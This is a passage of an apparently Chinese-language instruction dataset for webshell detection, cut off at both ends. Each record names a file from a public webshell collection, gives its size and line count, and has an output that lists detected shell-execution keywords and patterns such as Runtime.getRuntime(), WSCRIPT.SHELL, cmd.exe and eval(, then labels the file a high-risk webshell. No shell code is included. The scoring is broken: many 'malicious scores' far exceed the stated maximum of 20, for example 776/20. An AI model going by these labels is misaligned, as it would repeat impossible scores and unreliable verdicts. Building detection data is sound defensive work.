"malicious_score": 9, "md5_hash": "b815611cc39f17f05a73444d699341d4"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"829 bytes\", \"行数\": 35}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/jsp/cmd.jsp", "malicious_score": 15, "md5_hash": "5391c4a8af1ede757ba9d28865e75853"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd_win32.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"823 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/jsp/win32/cmd_win32.jsp", "malicious_score": 15, "md5_hash": "cc4d4d6cc9a25984aa9a7583c7def174"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdasp.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"1401 bytes\", \"行数\": 42}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, cmd.exe 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/asp/cmdasp.aspx", "malicious_score": 12, "md5_hash": "b1b12e2221ab524eeb51af53d144a106"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"up.asp\", \"文件类型\": \"asp\", \"文件大小\": \"4467 bytes\", \"行数\": 137}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/asp/up.asp", "malicious_score": 14, "md5_hash": "f775e721cfe85019fe41c34f47c0d67c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdasp.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1526 bytes\", \"行数\": 55}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.Form, WSCRIPT.SHELL, Response.Write, cmd.exe 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/asp/cmdasp.asp", "malicious_score": 21, "md5_hash": "57b51418a799d2d016be546f399c2e9b"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1372 bytes\", \"行数\": 79}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/asp/list.asp", "malicious_score": 30, "md5_hash": "1cfa493a165eb4b43e6d4cc0f2eab575"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd-asp-5.1.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1200 bytes\", \"行数\": 41}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, response.write, Request.Form, WSCRIPT.SHELL, Response.Write 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/asp/cmd-asp-5.1.asp", "malicious_score": 30, "md5_hash": "8baa99666bf3734cbdfdd10088e0cd9f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ntdaddy.asp\", \"文件类型\": \"asp\", \"文件大小\": \"41788 bytes\", \"行数\": 1013}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.form, request.form, Request.Form, WSCRIPT.SHELL 发现混淆技术: chr\\s*\\( 恶意度评分: 776/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/asp/ntdaddy.asp", "malicious_score": 776, "md5_hash": "3c0e713347e5a86134f7349aa50234d9"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.asp\", \"文件类型\": \"asp\", \"文件大小\": \"923 bytes\", \"行数\": 47}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, cmd.exe, WSCRIPT.SHELL, CreateObject( 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/asp/cmd.asp", "malicious_score": 18, "md5_hash": "895ca846858c315a3ff8daa7c55b3119"}} {"instruction": "分析这个perl文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pps-v4.0.pl\", \"文件类型\": \"perl\", \"文件大小\": \"57222 bytes\", \"行数\": 82}", "output": "这是一个perl类型的webshell文件。 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, ord\\s*\\( 包含网络功能: wget 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_perl_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/pl/pps-pl/pps-v4.0.pl", "malicious_score": 9, "md5_hash": "653708cd0967a66e14963467d7320ab6"}} {"instruction": "分析这个perl文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pps-v3.5.pl\", \"文件类型\": \"perl\", \"文件大小\": \"52052 bytes\", \"行数\": 79}", "output": "这是一个perl类型的webshell文件。 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_perl_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/pl/pps-pl/pps-v3.5.pl", "malicious_score": 7, "md5_hash": "56bc2906b6ea007ce117cfc87db055c9"}} {"instruction": "分析这个perl文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pps-v3.0.pl\", \"文件类型\": \"perl\", \"文件大小\": \"50894 bytes\", \"行数\": 78}", "output": "这是一个perl类型的webshell文件。 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_perl_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/pl/pps-pl/pps-v3.0.pl", "malicious_score": 7, "md5_hash": "c8a3147779d793e2974fbaaffd1ab4fc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell2020-12-06.php\", \"文件类型\": \"php\", \"文件大小\": \"660 bytes\", \"行数\": 26}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: call_user_func(, eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Behinder/shell2020-12-06.php", "malicious_score": 11, "md5_hash": "d209f4484f260234aa7aff75f99b9494"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell-2021-03-18.php\", \"文件类型\": \"php\", \"文件大小\": \"818 bytes\", \"行数\": 35}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, $_GET[ 发现混淆技术: chr\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Behinder/shell-2021-03-18.php", "malicious_score": 8, "md5_hash": "459bf6c1f9bd53526ad4a3369ebf8be8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell.php\", \"文件类型\": \"php\", \"文件大小\": \"589 bytes\", \"行数\": 29}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: call_user_func(, eval(, file_get_contents( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Behinder/shell.php", "malicious_score": 9, "md5_hash": "514271df4ee48f4e7bc97070ec71eeaf"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell-2021-04-23.php\", \"文件类型\": \"php\", \"文件大小\": \"1033 bytes\", \"行数\": 28}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: call_user_func(, eval( 发现混淆技术: chr\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Behinder/shell-2021-04-23.php", "malicious_score": 8, "md5_hash": "422aa7e6efe63e0f659e8f25b77ac803"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"AspxSpy2014Final.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"109750 bytes\", \"行数\": 2964}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 54/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/AspxSpy2014Final.aspx", "malicious_score": 54, "md5_hash": "45d854e66631e5c1cda6dbf4fea074ce"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"con2.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"31666 bytes\", \"行数\": 1012}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, cmd.Exe, Response.Write, cmd.exe 具备文件操作能力: copy\\s*\\( 恶意度评分: 283/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/con2.aspx", "malicious_score": 283, "md5_hash": "ac3b1ef06facbd3a2a01d30347588579"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"icesword.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70232 bytes\", \"行数\": 2579}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/icesword.aspx", "malicious_score": 36, "md5_hash": "a044b2459dab4e7240cb7703c98c6d91"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ASPXspy2.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70372 bytes\", \"行数\": 2587}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/ASPXspy2.aspx", "malicious_score": 36, "md5_hash": "07191f554ed5d9025bc85ee1bf51f975"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2013110125222650.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"27229 bytes\", \"行数\": 900}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, cmd.Exe, Response.Write, cmd.exe 具备文件操作能力: copy\\s*\\( 恶意度评分: 277/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/2013110125222650.aspx", "malicious_score": 277, "md5_hash": "378aa33219c69b43a7d674368ba7ae36"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspx下嗅探工具websniff1.0-linux.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"20399 bytes\", \"行数\": 707}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.Form 具备文件操作能力: copy\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/aspx下嗅探工具websniff1.0-linux.aspx", "malicious_score": 10, "md5_hash": "6fbfc835c1f5caf2959d11f78a36dd62"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"111.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70053 bytes\", \"行数\": 2578}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/111.aspx", "malicious_score": 36, "md5_hash": "4473fd5a51392dcd67bc35e4b8d8a612"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Aspx一句话木马小集.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"960 bytes\", \"行数\": 34}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, request.form, eval(, response.write 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/Aspx一句话木马小集.aspx", "malicious_score": 15, "md5_hash": "a7b76cf60d3d0e64c100fe5d529a4b04"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"a1.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"1977 bytes\", \"行数\": 87}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, WScript.Shell 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/a1.aspx", "malicious_score": 9, "md5_hash": "b77201565e980461a22f790a69610ed6"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"61207 bytes\", \"行数\": 1689}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, request.QueryString, Response.write, CreateObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 426/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/wso.aspx", "malicious_score": 426, "md5_hash": "d546b2c2b98d96c464652291a855b250"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"filesystembrowser.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"6945 bytes\", \"行数\": 207}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/asp.net-backdoors/filesystembrowser.aspx", "malicious_score": 48, "md5_hash": "fa0366e2cf46df761be83685b39f59b9"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdexec.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"2919 bytes\", \"行数\": 96}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, cmd.exe 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/asp.net-backdoors/cmdexec.aspx", "malicious_score": 18, "md5_hash": "67af0bc97b3ea18025a88a0b0201c18d"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sql.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"3303 bytes\", \"行数\": 104}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/asp.net-backdoors/sql.aspx", "malicious_score": 6, "md5_hash": "3125bf04153259891bf64e9ceaa95769"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fileupload.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"3932 bytes\", \"行数\": 126}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 54/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/aspx/asp.net-backdoors/fileupload.aspx", "malicious_score": 54, "md5_hash": "f6591c1ab7f7b782c386af1b6c2c0e9b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Exception.php\", \"文件类型\": \"php\", \"文件大小\": \"292 bytes\", \"行数\": 16}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval( 发现混淆技术: pack\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/webshell-free/php/Exception.php", "malicious_score": 8, "md5_hash": "6164f73a01a67765d06a74a519aa32da"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ROOTtows.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6220 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ROOTtows.jsp", "malicious_score": 23, "md5_hash": "be0346a5d1feb18ea37d16ad1947bf23"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zend.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"144061 bytes\", \"行数\": 4237}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 462/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/zend.jsp", "malicious_score": 462, "md5_hash": "591ca89a25f06cf01e4345f98a22845c"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma (1).jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6220 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ma (1).jsp", "malicious_score": 23, "md5_hash": "8017225000a9c7eabb6c1b0f60dc3728"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"myxx1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"142414 bytes\", \"行数\": 4201}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 459/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/myxx1.jsp", "malicious_score": 459, "md5_hash": "e0354099bee243702eb11df8d0e046df"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"warn.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"29421 bytes\", \"行数\": 995}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/warn.jsp", "malicious_score": 37, "md5_hash": "e9a5280f77537e23da2545306f6a19ad"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"hsxa.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"700 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hsxa.jsp", "malicious_score": 9, "md5_hash": "d0e05f9c9b8e0b3fa11f57d9ab800380"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"000.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"120779 bytes\", \"行数\": 3312}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 465/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/000.jsp", "malicious_score": 465, "md5_hash": "2eeb8bf151221373ee3fd89d58ed4d38"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-09-03-03.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"647 bytes\", \"行数\": 17}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, request.getParameter, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/2022-09-03-03.jsp", "malicious_score": 9, "md5_hash": "ed7def2297a8675aa7b3f2162839c568"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"yijuhua.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"8598 bytes\", \"行数\": 288}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/yijuhua.jsp", "malicious_score": 26, "md5_hash": "de193b4289069b2ce425f898dfa27714"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ProcessBuilder-reflect-cmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1790 bytes\", \"行数\": 54}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ProcessBuilder-reflect-cmd.jsp", "malicious_score": 6, "md5_hash": "4ab0caa03b3a2322c3c8b68fa39321a2"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"新型JSP小马支持上传任意格式文件.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"306 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/新型JSP小马支持上传任意格式文件.jsp", "malicious_score": 6, "md5_hash": "b291bf3ccc9dac8b5c7e1739b8fa742e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"u.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84500 bytes\", \"行数\": 2323}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/u.jsp", "malicious_score": 315, "md5_hash": "6acc82544be056580c3a1caaa4999956"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jdbc.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"7668 bytes\", \"行数\": 297}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jdbc.jsp", "malicious_score": 26, "md5_hash": "23b0e6f91a8f0d93b9c51a2a442119ce"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"IXRbE.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"181 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/IXRbE.jsp", "malicious_score": 9, "md5_hash": "e26e7e0ebc6e7662e1123452a939e2cd"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jsp-reverse.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2357 bytes\", \"行数\": 90}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jsp-reverse.jsp", "malicious_score": 12, "md5_hash": "ea87f0c1f0535610becadf5a98aca2fc"}} {"instruction": 